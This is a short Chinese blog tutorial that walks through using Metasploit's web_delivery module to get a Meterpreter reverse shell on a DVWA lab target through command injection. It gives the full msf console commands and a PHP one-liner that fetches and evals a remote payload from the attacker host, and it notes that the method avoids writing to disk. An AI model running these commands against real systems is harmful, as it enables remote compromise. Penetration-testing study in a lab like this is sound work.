使用Metasploit web_delivery 反弹shell

Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。

此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。

当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效载荷都在攻击机器上,所以攻击继续进行而没有写入磁盘。这有助于保持攻击指纹低。

这是在Metasploitable中的Damn Vulnerable Web Application(DVWA)上执行此模块的一个示例。

点击左侧面板中的“DVWA Security”。将安全级别设置为“low”,然后单击“Submit”。
在这里插入图片描述
首先,我们检查简单的命令执行。

点击“Command Execution”。输入一个IP地址,后跟一个分号和您希望执行的命令。
在这里插入图片描述

接下来开始使用MSF

msf6 > use exploit/multi/script/web_delivery
msf6 exploit(multi/script/web_delivery) > set target php
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.61.145
msf6 exploit(multi/script/web_delivery) > run

在这里插入图片描述

然后让目标执行

php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.61.145:8080/TjacnU4Z44g2DuK', false, stream_context_create(['ssl'=>['verify_pe
er'=>false,'verify_peer_name'=>false]])));"

在这里插入图片描述

得到shell

在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值